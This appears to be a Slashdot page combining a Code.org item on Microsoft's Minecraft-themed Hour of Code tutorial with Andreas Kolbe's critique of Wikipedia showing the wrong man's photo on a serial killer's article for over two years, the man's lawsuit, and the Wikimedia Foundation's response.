Special thanks to clovis (Slashdot reader #4,684) for the submission — and for also sharing "some general info about diesel-electric locomotives" and "some detail on the AC-DC-AC drive."

theodp writes: On Tuesday, Code.org announced that the new activities for kids in this year's Hour Of Code will include yet another Minecraft-themed tutorial from Code.org Diamond Supporter Microsoft, making it seven years in a row that the best-selling videogame of all time has 'headlined' the Hour of Code during the holiday buying season. Going into the Hour of Code in 2018, Microsoft boasted that 100+ million Minecraft Hour of Code tutorials had already been logged by students.

In this year's Hour of Code: TimeCraft tutorial, kids will "learn basic coding concepts to correct mysterious mishaps throughout history!" An accompanying one-size-fits-all lesson plan for ages 6-18 instructs students to: "Experience a choose-your-own-adventure game, exploring key moments in human achievement. Using your coding superpowers, save the future by solving mysterious mishaps in time." Among other things, the coding challenges have K-12 students travel back in time to save Jazz from a kazoo future, prevent the Great Pyramids from being built as cubes, save the Great Wall of China from destruction by pandas, and wipe the frown off of the Mona Lisa. New this year, Microsoft notes, is that educators can sign up to have a Microsoft Education Expert lead their classroom through an Hour of Code lesson with Minecraft, thanks to the magic of Microsoft Teams Live Events.

Andreas Kolbe is a former co-editor-in-chief of The Signpost, an online newspaper for (English-language) Wikipedia that's been published online since 2005 with contributions from Wikipedia editors. Kolbe has been contributing to it since 2006.

Last week he returned to the Signpost to share a cautionary tale. Its title? "A photo on Wikipedia can ruin your life."

Also a long-time Slashdot reader, Andreas Kolbe shares this summary with us: For more than two years, Wikipedia illustrated its article on New York serial killer Nathaniel White with the police photo of an African-American man from Florida who happened to have the same name. A Wikipedia user said he had found the picture on crimefeed.com, a "true crime" site associated with the Discovery Channel, which also used the same photo in a TV broadcast on the serial killer.

During the two-and-a-half years the Wikipedia article showed the picture of the wrong man, it was viewed over 125,000 times, including nearly 12,000 times on the day the TV program ran. The man whose picture was used said he received threats to his person from people who assumed he really was the killer, and took to dressing incognito.

His picture is now all over Google when people search for the serial killer.
"Friends and family contacted Plaintiff concerning the broadcast and asking Plaintiff if he actually murdered people in the state of New York," adds a legal complaint the man eventually filed against the Wikimedia Foundation. "Plaintiff assured these friends and family that even though he acknowledged his criminal past, he never murdered anyone nor has he ever been to the state of New York...."

Last month the legal director of the Wikimedia Foundation and a Legal Fellow co-authored a blog post pointing out the lawsuit "was filed months after Wikipedia editors proactively corrected the error at issue in September 2020." The blog post celebrates a judge's dismissal of the suit as "a victory for free knowledge," and acknowledges the protections afforded by Section 230 of the Communications Decency Act. "Our ability to maintain and grow the world's largest repository of free knowledge depends on robust legal immunity.... The Wikimedia Foundation applauds this ruling and remains committed to protecting global exchange of knowledge and freedom of expression across the internet."

But the blog post also argued that "the many members of our volunteer community are very effective at identifying and removing these inaccuracies when they do occur." Andreas Kolbe disagrees. "The photo was in the article for over two years," Kolbe writes on Signpost. "For a man to have his face presented to the world as that of a serial killer on a top-20 website, for such a significant amount of time, can hardly be described as indicative of 'very effective' quality control on the part of the community." The picture was only removed after a press report pointed out that Wikipedia had the wrong picture. This means the deletion was in all likelihood reactive rather than "proactive"...

The wrong photograph appears to have been removed by an unknown member of the public, an IP address that had never edited before and has not edited since. The volunteer community seems to have been completely unaware of the problem throughout...

It would seem more appropriate -

- to acknowledge that community processes failed Mr. White to a quite egregious degree, and
- to alert the community to the fact that its quality control processes are in need of improvement....

Surely Wikipedia's guidelines, policies and community practices for sourcing images, in particular images used to imply responsibility for specific crimes, would benefit from some strengthening, to ensure they actually depict the correct individual.
Pondering the dismissal of the lawsuit, Kolbe ultimately asks if there's a deeper moral question in a world where a man was "defamed on our global top-20 website with absolute impunity, without his having any realistic hope of redress for what happened to him." While to the best of my belief the error did not originate in Wikipedia, but was imported into Wikipedia from an unreliable external site, for more than two years any vigilante Googling Nathaniel White serial killer would have seen Mr. White's color picture prominently displayed in Google's knowledge graph panel (multiple copies of it still appear there at the time of writing). And along with it they would have found a prominent link to the serial killer's Wikipedia biography, again featuring Mr. White's image — providing what looked like encyclopedic confirmation that Mr. White of Florida was indeed guilty of sickening crimes...

On the very day the picture was removed from the article here, a video about the serial killer was uploaded to YouTube — complete with Mr. White's picture, citing Wikipedia. At the time of writing, the video's title page with Mr. White's color picture is the top Google image result in searches for the serial killer. All in all, seven of Google's top-fifteen image search results for Nathaniel White serial killer today feature Mr. White's image. Only two black-and-white photos show what seems to have been the real killer.
A comment on the Wikimedia Foundation blog adds, "What I'd much rather see is an acknowledgement that the community process failed Mr White to an extreme degree and that steps will be taken to prevent recurrence of such cases."